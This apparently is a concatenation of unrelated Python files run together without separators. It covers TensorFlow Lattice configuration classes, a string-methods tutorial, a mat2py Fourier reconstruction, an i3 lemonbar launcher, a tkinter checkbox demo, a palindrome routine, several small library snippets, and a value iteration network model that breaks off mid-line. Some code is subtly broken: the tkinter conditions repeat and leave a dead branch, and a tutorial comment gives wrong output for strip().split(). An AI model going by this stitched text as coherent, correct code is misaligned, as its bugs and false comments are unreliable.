calibration should be used on the inputs to the middle lattice. middle_calibration_num_keypoints: Number of keypoints to use for the middle piecewise-linear calibration. middle_monotonicity: Specifies if the middle calibrators should be monotonic, using 'increasing' or 1 to indicate increasing monotonicity, 'decreasing' or -1 to indicate decreasing monotonicity, and 'none' or 0 to indicate no monotonicity constraints. middle_lattice_interpolation: One of 'hypercube' or 'simplex'. For a d-dimensional lattice, 'hypercube' interpolates 2^d parameters, whereas 'simplex' uses d+1 parameters and thus scales better. For details see `tfl.lattice_lib.evaluate_with_simplex_interpolation` and `tfl.lattice_lib.evaluate_with_hypercube_interpolation`. aggregation_lattice_interpolation: One of 'hypercube' or 'simplex'. For a d-dimensional lattice, 'hypercube' interpolates 2^d parameters, whereas 'simplex' uses d+1 parameters and thus scales better. For details see `tfl.lattice_lib.evaluate_with_simplex_interpolation` and `tfl.lattice_lib.evaluate_with_hypercube_interpolation`. output_min: Lower bound constraint on the output of the model. output_max: Upper bound constraint on the output of the model. output_calibration: If a piecewise-linear calibration should be used on the output of the lattice. output_calibration_num_keypoints: Number of keypoints to use for the output piecewise-linear calibration. output_initialization: The initial values to setup for the output of the model. When using output calibration, these values are used to initialize the output keypoints of the output piecewise-linear calibration. Otherwise the lattice parameters will be setup to form a linear function in the range of output_initialization. It can be one of: - String `'uniform'`: Output is initliazed uniformly in label range. - A list of numbers: To be used for initialization of the output lattice or output calibrator. """ super(AggregateFunctionConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return AggregateFunctionConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) class FeatureConfig(_Config, _HasRegularizerConfigs): """Per-feature configuration for TFL canned estimators. A feature can either be numerical or categorical. Numeric features will be calibrated using a piecewise-linear function with the given number of keypoints. Categorical features should have `num_buckets > 0` and the `vocabulary_list` represent their categories. Several of the config fields can be filled in automatically based on the `FeatureColumns` used by the model but can also be provided explicitly. See `__init__` args comments for details. Currently only one dimensional feature are supported. Examples: ```python feature_columns = [ tf.feature_column.numeric_column.numeric_column( 'age', default_value=-1), tf.feature_column.numeric_column.categorical_column_with_vocabulary_list( 'thal', vocabulary_list=['normal', 'fixed', 'reversible']), ... ] model_config = tfl.configs.CalibratedLatticeConfig( feature_configs=[ tfl.configs.FeatureConfig( name='age', lattice_size=3, # Monotonically increasing. monotonicity='increasing', # Per feature regularization. regularizer_configs=[ tfl.configs.RegularizerConfig(name='calib_hessian', l2=1e-4), ], ), tfl.configs.FeatureConfig( name='thal', # Partial monotonicity: # output(normal) <= output(fixed) # output(normal) <= output(reversible) monotonicity=[('normal', 'fixed'), ('normal', 'reversible')], ), ], # Global regularizers regularizer_configs=[...]) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn) estimator.train(input_fn=train_input_fn) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, name, is_missing_name=None, default_value=None, lattice_size=2, monotonicity='none', unimodality='none', reflects_trust_in=None, dominates=None, pwl_calibration_always_monotonic=False, pwl_calibration_convexity=0, pwl_calibration_num_keypoints=10, pwl_calibration_input_keypoints='quantiles', pwl_calibration_clip_min=None, pwl_calibration_clip_max=None, pwl_calibration_clamp_min=False, pwl_calibration_clamp_max=False, num_buckets=0, vocabulary_list=None, regularizer_configs=None): """Initializes a `FeatureConfig` instance. Args: name: The name of the feature, which should match the name of a given FeatureColumn or a key in the input feature dict. is_missing_name: The name of a FeatureColumn or key in the input feature dict that indicates missing-ness of the main feature. default_value: [Automatically filled in from `FeatureColumns`] If set, this value in the input value represents missing. For numeric features, the output will be imputed. If default_value is provided for a categocial features, it would corresponds to the last bucket counted in num_buckets. lattice_size: The number of lattice verticies to be used along the axis for this feature. monotonicity: - For numeric features, specifies if the model output should be monotonic in this feature, using 'increasing' or 1 to indicate increasing monotonicity, 'decreasing' or -1 to indicate decreasing monotonicity, and 'none' or 0 to indicate no monotonicity constraints. - For categorical features, a list of (category_a, category_b) pairs from the vocabulary list indicating that with other features fixed, model output for category_b should be greater than or equal to category_a. If no vocabulary list is specified, we assume implcit vocabulary in the range `[0, num_buckets - 1]`. unimodality: For numeric features specifies if the model output should be unimodal in corresponding feature, using 'valley' or 1 to indicate that function first decreases then increases, using 'peak' or -1 to indicate that funciton first increases then decreases, using 'none' or 0 to indicate no unimodality constraints. Not used for categorical features. reflects_trust_in: None or a list of `tfl.configs.TrustConfig` instances. dominates: None or a list of `tfl.configs.DominanceConfig` instances. pwl_calibration_always_monotonic: Specifies if the piecewise-linear calibration should always be monotonic regardless of the specified end-to-end model output `monotonicity` with respect to this feature. pwl_calibration_convexity: Spefices the convexity constraints of the calibrators for numeric features. Convexity is indicated by 'convex' or 1, concavity is indicated by 'concave' or -1, 'none' or 0 indicates no convexity/concavity constraints. Does not affect categorical features. Concavity together with increasing monotonicity as well as convexity together with decreasing monotonicity results in diminishing return constraints. pwl_calibration_num_keypoints: Number of keypoints to use for piecewise-linear calibration. pwl_calibration_input_keypoints: Indicates what should be used for the input keypoints of the piecewise-linear calibration. It can be one of: - String `'quantiles'`: Input keypoints are set to feature quantiles. - String `'uniform'`: Input keypoints are uniformly spaced in feature range. - A list of numbers: Explicitly specifies the keypoints. pwl_calibration_clip_min: Input values are lower clipped by this value. pwl_calibration_clip_max: Input values are upper clipped by this value. pwl_calibration_clamp_min: for monotonic calibrators ensures that the minimum value in calibration output is reached. pwl_calibration_clamp_max: for monotonic calibrators ensures that the maximum value in calibration output is reached. num_buckets: [Automatically filled in from `FeatureColumns`] Number of categories for a categorical feature. Out-of-vocabulary and missing/default value should be counted into num_buckets (last buckets). vocabulary_list: [Automatically filled in from `FeatureColumns`] The input vocabulary of the feature. regularizer_configs: None or a list of per-feature `tfl.configs.RegularizerConfig` instances. """ super(FeatureConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return FeatureConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) class RegularizerConfig(_Config): """Regularizer configuration for TFL canned estimators. Regularizers can either be applied to specific features, or can be applied globally to all features or lattices. * **Calibrator regularizers:** These regularizers are applied to PWL calibration layers. - `'calib_laplacian'`: Creates an instance of `tfl.pwl_calibration_layer.LaplacianRegularizer`. A calibrator laplacian regularizer penalizes the changes in the output and results in a *flatter calibration function*. - `'calib_hessian'`: Creates an instance of `tfl.pwl_calibration_layer.HessianRegularizer`. A calibrator hessian regularizer penalizes changes in the slope, resulting in a *more linear calibration*. - `'calib_wrinkle'`: Creates an instance of `tfl.pwl_calibration_layer.WrinkleRegularizer`. A calibrator wrinkle regularizer penalizes the second derivative, resulting in a smoother function with *less changes in the curvature*. * **Lattice regularizers:** These regularizers are applied to lattice layers. - `'laplacian'`: Creates an instance of `tfl.lattice_layer.LaplacianRegularizer`. Laplacian regularizers penalize the difference between adjacent vertices in multi-cell lattice, resulting in a *flatter lattice function*. - `'torsion'`: Creates an instance of `tfl.lattice_layer.TorsionRegularizer`. Torsion regularizers penalizes how much the lattice function twists from side-to-side, a non-linear interactions in each 2 x 2 cell. Using this regularization results in a *more linear lattice function*. Examples: ```python model_config = tfl.configs.CalibratedLatticeConfig( feature_configs=[ tfl.configs.FeatureConfig( name='age', lattice_size=3, # Per feature regularization. regularizer_configs=[ tfl.configs.RegularizerConfig(name='calib_hessian', l2=1e-4), ], ), tfl.configs.FeatureConfig( name='thal', # Partial monotonicity: # output(normal) <= output(fixed) # output(normal) <= output(reversible) monotonicity=[('normal', 'fixed'), ('normal', 'reversible')], ), ], # Global regularizers regularizer_configs=[ # Torsion regularizer applied to the lattice to make it more linear. configs.RegularizerConfig(name='torsion', l2=1e-4), # Globally defined calibration regularizer is applied to all features. configs.RegularizerConfig(name='calib_hessian', l2=1e-4), ]) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn) estimator.train(input_fn=train_input_fn) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, name, l1=0.0, l2=0.0): """Initializes a `RegularizerConfig` instance. Args: name: The name of the regularizer. l1: l1 regularization amount. l2: l2 regularization amount. """ super(RegularizerConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return RegularizerConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) class TrustConfig(_Config): """Configuration for feature trusts in TFL canned estimators. You can specify how a feature reflects trust in another feature. Supported trust types (see `tfl.layers.Lattice` for details): - `'edgeworth'`: Edgeworth trust constrains the function to be more responsive to a main feature as a secondary conditional feature increases or decreases. For example, we may want the model to rely more on average rating (main feature) when the number of reviews (conditional feature) is high. In particular, the constraint guarantees that a given change in the main feature's value will change the model output by more when a secondary feature indicates higher trust in the main feature. Note that the constraint only works when the model is monotonic in the main feature. - `'trapezoid'`: Trapezoid trust is conceptually similar to edgeworth trust, but this constraint guarantees that the range of possible outputs along the main feature dimension, when a conditional feature indicates low trust, is a *subset* of the range of outputs when a conditional feature indicates high trust. When lattices have 2 vertices in each constrained dimension, this implies edgeworth trust (which only constrains the size of the relevant ranges). With more than 2 lattice vertices per dimension, the two constraints diverge and are not necessarily 'weaker' or 'stronger' than each other - edgeworth trust acts throughout the lattice interior on delta shifts in the main feature, while trapezoid trust only acts on the min and max extremes of the main feature, constraining the overall range of outputs across the domain of the main feature. The two types of trust constraints can be applied jointly. Trust constraints only affect lattices. When using trapezoid constraints in ensemble models, note that if a conditional feature is used in a lattice without the main feature also being used in the same lattice, then the trapezoid constraint might be violated for the ensemble function. Exampes: One feature reflecting trust in another: ```python model_config = tfl.configs.CalibratedLatticeConfig( feature_configs=[ tfl.configs.FeatureConfig( name='num_reviews', reflects_trust_in=[ configs.TrustConfig( feature_name='average_rating', trust_type='edgeworth'), ], ), tfl.configs.FeatureConfig( name='average_rating', ), ]) ``` Features can reflect positive or negative trust in other features. For example if the task is to estimate a property price in a neighborhood given two average prices for commercial and residential properties, you can use a trust feature `percentage_commercial_properties` to indicate that the model should more responsive to commercial estimate if more properties are commercial in the neighborhood. You can simultaneously have a negative trust constratins for residential properties, since higher commercial land usage indicates fewer houses, hence less market influence and less accurate estimate for residential property prices. ```python model_config = tfl.configs.CalibratedLatticeConfig( feature_configs=[ tfl.configs.FeatureConfig( name='percentage_commercial_properties', reflects_trust_in=[ configs.TrustConfig( feature_name='average_commercial_property_price', direction='positive'), configs.TrustConfig( feature_name='average_residential_property_price', direction='negative'), ], ), tfl.configs.FeatureConfig( name='average_commercial_property_price', ), tfl.configs.FeatureConfig( name='average_residential_property_price', ), tfl.configs.FeatureConfig( name='square_footage', ), ... ]) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, feature_name, trust_type='edgeworth', direction='positive'): """Initializes a `TrustConfig` instance. Args: feature_name: Name of the "main" feature for the trust constraint. trust_type: Type of trust constraint. Either `'edgeworth'` or `'trapezoid'`. direction: Direction of the trust. Should be: `'positive'`, `'negative'`, 1 or -1. """ super(TrustConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return TrustConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) class DominanceConfig(_Config): """Configuration for dominance constraints in TFL canned estimators. You can specify how a feature dominantes another feature. Supported dominance types (see `tfl.layers.Lattice` and `tfl.layers.Linear` for details): - `'monotonic'`: Monotonic dominance constrains the function to require the effect (slope) in the direction of the *dominant* dimension to be greater than that of the *weak* dimension for any point in both lattice and linear models. Both dominant and weak dimensions must be monotonic. The constraint is guranteed to satisfy at the end of training for linear models, but might not be strictly satisified for lattice models. In such cases, increase the number of projection iterations. Example: ```python model_config = tfl.configs.CalibratedLatticeConfig( feature_configs=[ tfl.configs.FeatureConfig( name='num_purchases', dominates=[ configs.DominanceConfig( feature_name='num_clicks', dominance_type='monotonic'), ], ), tfl.configs.FeatureConfig( name='num_clicks', ), ]) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, feature_name, dominance_type='monotonic'): """Initializes a `DominanceConfig` instance. Args: feature_name: Name of the `"dominant"` feature for the dominance constraint. dominance_type: Type of dominance constraint. Currently, supports `'monotonic'`. """ super(DominanceConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return DominanceConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) class _TypeDict(collections.defaultdict): """Type dict that defaults to string type for hparams.""" def __init__(self, hparams): super(_TypeDict, self).__init__(lambda: str, {k: type(v) for k, v in hparams.values().items()}) def __contains__(self, _): return True def apply_updates(model_config, updates): """Updates a model config with the given set of (key, values) updates. Any value passed in the updates that matches a field of the config will be applied to the config. Nested configs can be updated as follows: to add/update a field `FIELD` in feature config for feature `FEATURE`, use `feature__FEATURE__FIELD` as the key. To add/update a field `FIELD` for regularizer with name `REGULARIZER` use `regularizer__REGULARIZER__FIELD` as the key. This naming scheme can be nested. When possible, string values will be converted to the corresponding value type in the model config. Example: ```python model_config = ... updates = [ ('output_max', 1), ('regularizer__torsion__l1', 0.001), ('feature__some_feature_name__lattice_size', 4), ('feature__some_feature_name__regularizer__calib_hessian__l2', 0.001), ('unrelated_haparam_not_affecting_model_config', 42), ] configs.apply_updates(model_config, updates) ``` Arguments: model_config: The model config object to apply the updates to. updates: A list of (key, value) pairs with potential config updates. Values that are not matched to a field in the model config will be ignored. Returns: Number of updates that are applied to the model config. """ applied_updates = 0 for k, v in updates: if _apply_update(model_config, k, v): applied_updates += 1 logging.info('Updated model config with %s=%s', k, str(v)) return applied_updates def _apply_update(node, k, v): """Applies k, v updates to the given config node. See apply_updates.""" while '__' in k: parts = k.split('__', 2) if len(parts) != 3: return False prefix, child_node_name, k = parts if (prefix == _HPARAM_FEATURE_PREFIX and isinstance(node, _HasFeatureConfigs)): node = node.feature_config_by_name(child_node_name) elif (prefix == _HPARAM_REGULARIZER_PREFIX and isinstance(node, _HasRegularizerConfigs)): node = node.regularizer_config_by_name(child_node_name) else: return False if hasattr(node, k): if isinstance(v, str): current_value = getattr(node, k) if current_value is None: raise ValueError( 'Field `{}` has None value and can not be overridden by the ' 'hparams string value `{}` since the type cannot be inferred. An ' 'initial value must be set for the field to use string hparams.' .format(k, v)) v = type(current_value)(v) setattr(node, k, v) return True return False 010-strings/3_string_methods.py strSample = "This is a sample String" print(strSample) # convert to upper case print(strSample.upper()) # convert to lower case print(strSample.lower()) # make it as title print(strSample.title()) # Removing whitespaces strSample2 = " This is a sample String with white spaces at the beginning and and the end! " print(strSample2) # prints " This is a sample String with white spaces at the beginning and and the end! " print(strSample2.strip()) # prints "This is a sample String with white spaces at the beginning and and the end!" print(strSample2.lstrip()) # prints "This is a sample String with white spaces at the beginning and and the end! " print(strSample2.rstrip()) # prints " This is a sample String with white spaces at the beginning and and the end!" # Replace string print(strSample2.replace("beginning", "start")) # Split string print(strSample2.split(" ")) # prints ['', 'This', 'is', 'a', 'sample', 'String', 'with', 'white', 'spaces', 'at', 'the', 'beginning', 'and', 'and', 'the', 'end!', ''] # Casecading methods print(strSample2.strip().split(" ")) # prints ['', 'This', 'is', 'a', 'sample', 'String', 'with', 'white', 'spaces', 'at', 'the', 'beginning', 'and', 'and', 'the', 'end!', ''] mat2py/mat2pyexamples/gallery/ReconstructSignal.py # type: ignore import mat2py as mp from mat2py.core import * def square(t, duty): tmp = mod(t, 2 * pi) w0 = ((2 * pi) @ M[duty]) / 100 nodd = tmp < w0 s = (2 * nodd) - 1 return s def example(): clear() clc() T = 40 F = mrdivide(1, T) D = 23 dt = (mrdivide(D, T)) * 100 N = 50 w0 = mrdivide(2 * pi, T) t1 = M[0:0.002:T] x1 = square(((2 * pi) @ M[F]) @ M[t1], dt) t2 = M[0:0.002:D] x2 = zeros(1, length(t2)) dif = T - D null_index = t1 <= D x2[I[null_index(M[1 : length(x2)])]] = x1(t1 <= D) x2[I[1, dif:D]] = x1(1, M[dif:D]) X = zeros(1, (2 * N) + 1) + 0j for k in M[(-N):N]: x3 = copy(x1) x3 = x3 * exp((((-1j) * k) @ M[w0]) @ M[t1]) for i in M[1 : (length(t1) - 1)]: X[I[(k + N) + 1]] = X((k + N) + 1) + ( ((M[t1(i + 1) - t1(i)]) @ (x3(i) + x3(i + 1))) / 2 ) x_rec = zeros(1, length(t1)) + 0j for k in M[(-N):N]: x_rec[I[i]] = x_rec(i) + ( (M[(mrdivide(1, T)) @ M[X(k + 51)]]) @ exp(((1j * k) @ M[w0]) @ M[t1(i)]) ) plot(t2, x2, t1, x_rec, "--") shg() w = M[((-50) * w0) : w0 : (50 * w0)] plot(mrdivide(w, 2 * pi), abs(X), "o") shg() if __name__ == "__main__": example() __doc__ = """ % this example is a slightly modified version % from [here](https://www.physicsforums.com/threads/reconstruct-a-signal-by-determining-the-n-fourier-coefficients.982179/) function example() clear(); clc(); %My code: %Type of signal: square T = 40; %Period of the signal [s] F=1/T; % fr D = 23; % length of signal(duration) dt=(D/T)*100; N = 50; %Number of coefficients w0 = 2*pi/T; %signal pulse t1= 0:0.002:T; % original signal sampling x1 = square((2*pi*F)*(t1),dt);%initial square signal t2= 0:0.002:D; %modified signal sampling x2 = zeros(1,length(t2)); %initializing the modified signal with null values. dif=T-D; null_index = t1<=D; % Matlab have a lot of strange beheviour x2(null_index(1:length(x2)))=x1(t1<=D);% modify the null values with values from the original signal. x2(1,dif:D)=x1(1,dif:D); %modify for values of t1>=T-D. X = zeros(1, 2*N+1)+0j; for k = -N:N %k represents the variable after which the sum is achieved x3 = x1; %x3 represents the signal obtained after the Fourier Series formula; x3 = x3 .* exp(-1i*k*w0*t1); end for i = 1:length(t1)-1 X(k+N+1) = X(k+N+1) + (t1(i+1)-t1(i)) * (x3(i)+x3(i+1))/2; %reconstruction using the coefficients end x_rec = zeros(1, length(t1))+0j; for k=-N:N x_rec(i) = x_rec(i) + (1/T) * X(k+51) * exp(1i*k*w0*t1(i)); %reconstruction using the coefficients ( the integral being calculated as a sum) end plot(t2,x2, t1, x_rec, '--') shg() w=-50*w0:w0:50*w0; %w is the vector which allows displaying the spectre of the function plot(w/(2*pi),abs(X), 'o'); shg() end % This function is copied from Matlab signal toolbox function s = square(t,duty) % Compute values of t normalized to (0,2*pi) tmp = mod(t,2*pi); % Compute normalized frequency for breaking up the interval (0,2*pi) w0 = 2*pi*duty/100; % Assign 1 values to normalized t between (0,w0), 0 elsewhere nodd = (tmp < w0); % The actual square wave computation s = 2*nodd-1; end """ i3_lemonbar.py #!/usr/bin/env python3 import os from i3_lemonbar_conf import * cwd = os.path.dirname(os.path.abspath(__file__)) lemon = "lemonbar -b -p -f '%s' -f '%s' -g '%s' -B '%s' -F '%s'" % (font, iconfont, geometry, color_back, color_fore) feed = "python3 -c 'import i3_lemonbar_feeder; i3_lemonbar_feeder.run()'" check_output('cd %s; %s | %s' % (cwd, feed, lemon), shell=True) import tkinter as tk window=tk.Tk() window.title('my windows') window.geometry('400x400') l=tk.Label(window,bg='yellow',width=20,text='empty') l.pack() def print_selection(): if (var1.get()==1 & (var2.get()==0)): l.config(text='I love only Python') elif (var1.get()==0 & (var2.get()==0)): l.config(text='I love only C++') elif (var1.get()==0 & (var2.get()==0)): l.config(text='I do not love either ') else: l.config(text='I love both') var1=tk.IntVar() var2=tk.IntVar() cl=tk.Checkbutton(window,text='Python',variable=var1,onvalue=1,offvalue=0 ,command=print_selection) c2=tk.Checkbutton(window,text='C++',variable=var2,onvalue=1,offvalue=0 ,command=print_selection) cl.pack() c2.pack() window.mainloop()''' Python program to reverse the digits of a given number and add it to the original, If the sum is not a palindrome repeat this procedure. Note: A palindrome is a word, number, or other sequence of characters which reads the same backward as forward, such as madam or racecar ''' def rev_number (n): s = 0 while True: k = str (n) if k == k[::-1]: break else: ''' when you do k[::-1], it starts from the end towards the first taking each element. So it reverses a. This is applicable for lists/tuples as well. ''' m = int (k[::-1]) n += m return n print(rev_number(1234)) print(rev_number(1473)) print(rev_number(9999)) examples/graph_classification.py import sys sys.path.append('../') from autogl.datasets import build_dataset_from_name, utils from autogl.solver import AutoGraphClassifier from autogl.module import Acc, BaseModel dataset = build_dataset_from_name('mutag') utils.graph_random_splits(dataset, train_ratio=0.4, val_ratio=0.4) autoClassifier = AutoGraphClassifier.from_config('../configs/graph_classification.yaml') # train autoClassifier.fit( dataset, time_limit=3600, train_split=0.8, val_split=0.1, cross_validation=True, cv_split=10, ) autoClassifier.get_leaderboard().show() print('best single model:\n', autoClassifier.get_leaderboard().get_best_model(0)) # test predict_result = autoClassifier.predict_proba() print(Acc.evaluate(predict_result, dataset.data.y[dataset.test_index].cpu().detach().numpy()))0 # Retrieve the version number of ped from the setup.py file. # This solution was suggested on Stack Overflow: # http://stackoverflow.com/questions/2058802/how-can-i-get-the-version-defined-in-setup-py-setuptools-in-my-package import pkg_resources # part of setuptools pedtools_version = pkg_resources.require("pedtools")[0].version from django.shortcuts import render from django.http import HttpRequest from django.http import HttpResponse # Create your views here. def index(request): context = { 'name': 'click' } # return HttpResponse('ok') return render(request, 'firstapp/index.html',context=context) 0 from drf_spectacular.extensions import OpenApiSerializerFieldExtension from drf_spectacular.plumbing import build_array_type, is_list_serializer class RecursiveFieldExtension(OpenApiSerializerFieldExtension): target_class = "rest_framework_recursive.fields.RecursiveField" def map_serializer_field(self, auto_schema, direction): proxied = self.target.proxied if is_list_serializer(proxied): component = auto_schema.resolve_serializer(proxied.child, direction) return build_array_type(component.ref) component = auto_schema.resolve_serializer(proxied, direction) return component.ref mstim/glycresoft1-10 from .glycan_source import ( TextFileGlycanHypothesisSerializer, GlycanTransformer, TextFileGlycanCompositionLoader, GlycanCompositionHypothesisMerger, GlycanTypes, named_reductions, named_derivatizations) from .constrained_combinatorics import ( CombinatorialGlycanHypothesisSerializer, CombinatoricCompositionGenerator) from .glycan_combinator import ( GlycanCombinationSerializer, GlycanCombinationBuilder) from .glyspace import ( NGlycanGlyspaceHypothesisSerializer, OGlycanGlyspaceHypothesisSerializer, TaxonomyFilter) from .synthesis import ( SynthesisGlycanHypothesisSerializer, ExistingGraphGlycanHypothesisSerializer, GlycanCompositionEnzymeGraph, synthesis_register) from .convert_analysis import ( GlycanAnalysisHypothesisSerializer, GlycopeptideAnalysisGlycanCompositionExtractionHypothesisSerializer) PhantomChain/python-crypto from crypto.transactions.deserializer import Deserializer def test_vote_deserializer(): serialized = 'ff011e0365b87502034151a3ec46b5670a682b0a63394f863587d1bc97483b1b6c70eb58e7f0aed19200e1f50500000000000101022cca9529ec97a772156c152a00aad155ee6708243e65c9d211a589cb5d43234d3045022100bb39554e077c0cd23ef8376731f6b0457edea0aa04c92a9ef07c84228aa5542c0220648365448a0b19c49ff0bab5cde0bee7999a9cfd5eaefc4a7f03b6f93a2efb51' # noqa deserializer = Deserializer(serialized) actual = deserializer.deserialize() assert actual.asset['votes'] == ['+022cca9529ec97a772156c152a00aad155ee6708243e65c9d211a589cb5d43234d'] # noqa actual.verify() trust/utils/models/__init__.py # __init__.py # Author: <> AIS-Bonn/abstract_vin1-10 # Model for 3D locomotion planning with individual footprints from __future__ import print_function, division import numpy as np import matplotlib.pyplot as plt import time import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import torch.optim.lr_scheduler as lr_scheduler from torch.autograd import Variable from torch.nn.parameter import Parameter from torch.utils.data import Dataset, DataLoader from math import ceil from multiprocessing import Pool from dataloader import GridDataset_3d from utils import get_action, calculate_local_footprints_mulitlayer, get_wheel_coord, get_path_length k_values = {8:10, 16:20, 32:40} # Value Iteration Network on multiple levels of abstraction class Abstraction_VIN_3D(nn.Module): def __init__(self, size, num_actions=11, k=None, leg_x=2, # distance between wheel and robot base (x coordinate) leg_y=2, # distance between wheel and robot base (y coordinate) num_orientations=16, # number of discrete orientations device = None, name=None, level_2_features = 5, # number of features for Level-2 representation level_3_features = 10, # number of features for Level-3 representation level_1_conv_features = [10,30,60], level_1_conv_kernels = [(5,5),(3,3),(3,3)], level_1_conv_paddings = [2,1,1], level_2_conv_features = [90,120], level_2_conv_kernels = [(5,5),(3,3)], level_2_conv_paddings = [2,1], level_3_conv_features = [150], level_3_conv_kernels = [(3,3)], level_3_conv_paddings = [1]): super(Abstraction_VIN_3D, self).__init__() self.size = size # grid world size self.size_eff = size//4 # size of each abstraction map self.level_2_features = level_2_features self.level_3_features = level_3_features self.features = 1+level_2_features+level_3_features # overall number of features of reward map (sum over all 3 levels) if name is None: self.name = 'Abstraction_VIN_3D_'+str(size) else: self.name=name print("Network name: ", self.name) self.device = device or torch.device("cuda:0" if torch.cuda.is_available() else "cpu") self.k = k or int(1.5*k_values[self.size_eff]) # number of iterations within VI module self.leg_x = leg_x self.leg_y = leg_y self.num_orientations = num_orientations self.rotation_step_size = 2*np.pi/num_orientations self.num_actions = num_actions # precompute orientation dependent local footprints self.local_footprints_1, self.local_footprints_2, self.local_footprints_3 = calculate_local_footprints_mulitlayer(leg_x, leg_y, num_orientations) self.local_footprints_1, self.local_footprints_2, self.local_footprints_3 = self.local_footprints_1.to(self.device), self.local_footprints_2.to(self.device), self.local_footprints_3.to(self.device) # learn abstract representations self.learn_level_2 = nn.Conv2d( in_channels=1, out_channels=level_2_features, kernel_size=(2, 2), stride=2, padding=0, bias=False) self.learn_level_3 = nn.Conv2d( in_channels=level_2_features, out_channels=level_3_features, kernel_size=(2, 2), stride=2, padding=0, bias=False) # process Level-1 self.abstraction_1_pad = nn.ConstantPad2d(int(0.25*self.size_eff), 0) self.level_1_conv = nn.ModuleList() self.level_1_conv.append(nn.Conv2d(in_channels=2, out_channels=level_1_conv_features[0], kernel_size=level_1_conv_kernels[0], stride=1, padding=level_1_conv_paddings[0], bias=True)) for i in range(1, len(level_1_conv_features)): self.level_1_conv.append(nn.Conv2d(in_channels=level_1_conv_features[i-1], out_channels=level_1_conv_features[i], kernel_size=level_1_conv_kernels[i], stride=1, padding=level_1_conv_paddings[i], bias=True)) # process Level-2 self.abstraction_2_pad = nn.ConstantPad2d(self.size_eff//4, 0) self.level_2_conv = nn.ModuleList() self.level_2_conv.append(nn.Conv2d(in_channels=self.num_orientations+level_2_features+1, out_channels=level_2_conv_features[0], kernel_size=level_2_conv_kernels[0], stride=1, padding=level_2_conv_paddings[0], bias=True)) for i in range(1, len(level_2_conv_features)): self.level_2_conv.append(nn.Conv2d(in_channels=level_2_conv_features[i-1], out_channels=level_2_conv_features[i], kernel_size=level_2_conv_kernels[i], stride=1, padding=level_2_conv_paddings[i], bias=True)) # process Level-3 self.level_3_conv = nn.ModuleList() self.level_3_conv.append(nn.Conv2d(in_channels=self.num_orientations*level_2_features+level_3_features+1, out_channels=level_3_conv_features[0], kernel_size=level_3_conv_kernels[0], stride=1, padding=level_3_conv_paddings[0], bias=True)) for i in range(1, len(level_3_conv_features)): self.level_3_conv.append(nn.Conv2d(in_channels=level_3_conv_features[i-1], out_channels=level_3_conv_features[i], kernel_size=level_3_conv_kernels[i], stride=1, padding=level_3_conv_paddings[i], bias=True)) # generate reward map self.r1 = nn.Conv2d( in_channels=level_1_conv_features[-1], out_channels=1*self.num_orientations, kernel_size=(1, 1), stride=1, padding=0, bias=False) self.r2 = nn.Conv2d( in_channels=level_2_conv_features[-1], out_channels=level_2_features*self.num_orientations, kernel_size=(1, 1), stride=1, padding=0, bias=False) self.r3 = nn.Conv2d( in_channels=level_3_conv_features[-1], out_channels=level_3_features*self.num_orientations, kernel_size=(1, 1), stride=1, padding=0, bias=False) # value iteration self.q1 = nn.Conv3d( in_channels=1, out_channels=num_actions, kernel_size=(3, 3, 3), stride=1, padding=0, bias=False) self.q2 = nn.Conv3d( in_channels=level_2_features, out_channels=num_actions, kernel_size=(3, 3, 3), stride=1, padding=0, bias=False) self.q3 = nn.Conv3d( in_channels=level_3_features, out_channels=num_actions, kernel_size=(3, 3, 3), stride=1, padding=0, bias=False) self.w = Parameter( torch.zeros(num_actions, 1, 3, 3, 3), requires_grad=True) # reactive policy (map state values to action probabilities) self.fc = nn.Linear(in_features=11, out_features=num_actions, bias=False) def forward(self, occ_map, goal_map, start_orientation, show_reward_map = False): # Create abstraction maps: # extract Level-1 map level_1 = occ_map[:,:,self.size//2 - self.size_eff//2: self.size//2 + self.size_eff//2,self.size//2 - self.size_eff//2: self.size//2 + self.size_eff//2] # create Level-2 representation level_2_full = self.learn_level_2(occ_map) # extract Level-2 map level_2 = level_2_full[:,:,self.size//4 - self.size_eff//2: self.size//4 + self.size_eff//2,self.size//4 - self.size_eff//2: self.size//4 + self.size_eff//2] # create Level-3 map level_3 = self.learn_level_3(level_2_full) # Create abstract goal maps goal_1 = goal_map[:,:,self.size//2 - self.size_eff//2: self.size//2 + self.size_eff//2,self.size//2 - self.size_eff//2: self.size//2 + self.size_eff//2] goal_2_full = F.max_pool2d(goal_map, (2,2)) goal_2 = goal_2_full[:,:,self.size//4 - self.size_eff//2: self.size//4 + self.size_eff//2,self.size//4 - self.size_eff//2: self.size//4 + self.size_eff//2] goal_3 = F.max_pool2d(goal_2_full, (2,2)) # Process Level 1: # stack with goal map abstraction_1 = torch.cat([level_1, goal_1], dim=1) # generate Level-1 reward map for conv in self.level_1_conv: abstraction_1 = conv(abstraction_1) abstraction_1 = self.r1(abstraction_1) r1 = abstraction_1 # reduce resolution (to fit resolution of Level-2) abstraction_1 = F.max_pool2d(abstraction_1, (2,2)) # pad abstraction_1 map (to match size of Level-2 map) abstraction_1 = self.abstraction_1_pad(abstraction_1) # Process Level-2: # stack with preprocessed Level-1 map and Level-2 goal map abstraction_2 = 